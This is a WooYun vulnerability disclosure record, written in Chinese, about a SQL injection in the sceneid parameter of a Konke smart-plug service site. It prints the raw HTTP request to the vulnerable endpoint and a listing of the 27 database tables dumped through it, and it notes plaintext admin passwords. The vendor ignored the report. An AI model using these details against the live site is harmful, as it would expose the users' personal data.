当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0174618

漏洞标题:控客mini智能插座某站存在SQL注入可获得大量用户数据

相关厂商:ikonke.com

漏洞作者: 路人甲

提交时间:2016-02-03 17:29

修复时间:2016-02-22 02:30

公开时间:2016-02-22 02:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-03: 细节已通知厂商并且等待厂商处理中
2016-02-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

以为是app访问的服务器就不会受到攻击?
问题页面

GET /KCredit/index.php/Home/Scene/showSceneDetail?sceneid=1333&[email protected] HTTP/1.1
Host: kcredit.ikonke.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://kcredit.ikonke.com/KCredit/index.php/Home/Scene/[email protected]
Cookie: PHPSESSID=meacp7b9un0bt9sr9dai11ug55
Connection: keep-alive


其中sceneid参数存在注入,跑了一下,发现涉及的表还有不少

Database: kcredit
[27 tables]
+-------------------------+
| tb_activity |
| tb_activityregistration |
| tb_ad |
| tb_admin |
| tb_aliorderlog |
| tb_blacklist |
| tb_coupon |
| tb_guessing |
| tb_guessingbid |
| tb_guessingoption |
| tb_indexad |
| tb_kmoneyhistory |
| tb_message |
| tb_order |
| tb_product |
| tb_promotion |
| tb_promotioncode |
| tb_promotioncodeused |
| tb_scene |
| tb_scenecomment |
| tb_scenedownloadrecord |
| tb_tempcreditrecord |
| tb_templog |
| tb_user |
| tb_usercoupon |
| tb_usereventlog |
| tb_zanhistory |
+-------------------------+


其中存在大量用户的信息

QQ20160203-0@2x.png


管理员的账号密码,竟然是明文

QQ20160203-2@2x.png


漏洞证明:

以为是app访问的服务器就不会受到攻击?
问题页面

GET /KCredit/index.php/Home/Scene/showSceneDetail?sceneid=1333&[email protected] HTTP/1.1
Host: kcredit.ikonke.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://kcredit.ikonke.com/KCredit/index.php/Home/Scene/[email protected]
Cookie: PHPSESSID=meacp7b9un0bt9sr9dai11ug55
Connection: keep-alive


其中sceneid参数存在注入,跑了一下,发现涉及的表还有不少

Database: kcredit
[27 tables]
+-------------------------+
| tb_activity |
| tb_activityregistration |
| tb_ad |
| tb_admin |
| tb_aliorderlog |
| tb_blacklist |
| tb_coupon |
| tb_guessing |
| tb_guessingbid |
| tb_guessingoption |
| tb_indexad |
| tb_kmoneyhistory |
| tb_message |
| tb_order |
| tb_product |
| tb_promotion |
| tb_promotioncode |
| tb_promotioncodeused |
| tb_scene |
| tb_scenecomment |
| tb_scenedownloadrecord |
| tb_tempcreditrecord |
| tb_templog |
| tb_user |
| tb_usercoupon |
| tb_usereventlog |
| tb_zanhistory |
+-------------------------+


其中存在大量用户的信息

QQ20160203-0@2x.png


管理员的账号密码,竟然是明文

QQ20160203-2@2x.png


修复方案:

注意做好过滤什么的....智能硬件的安全性非常重要,这些智能硬件的安全完全能影响到个人的人身安全了....

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-22 02:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无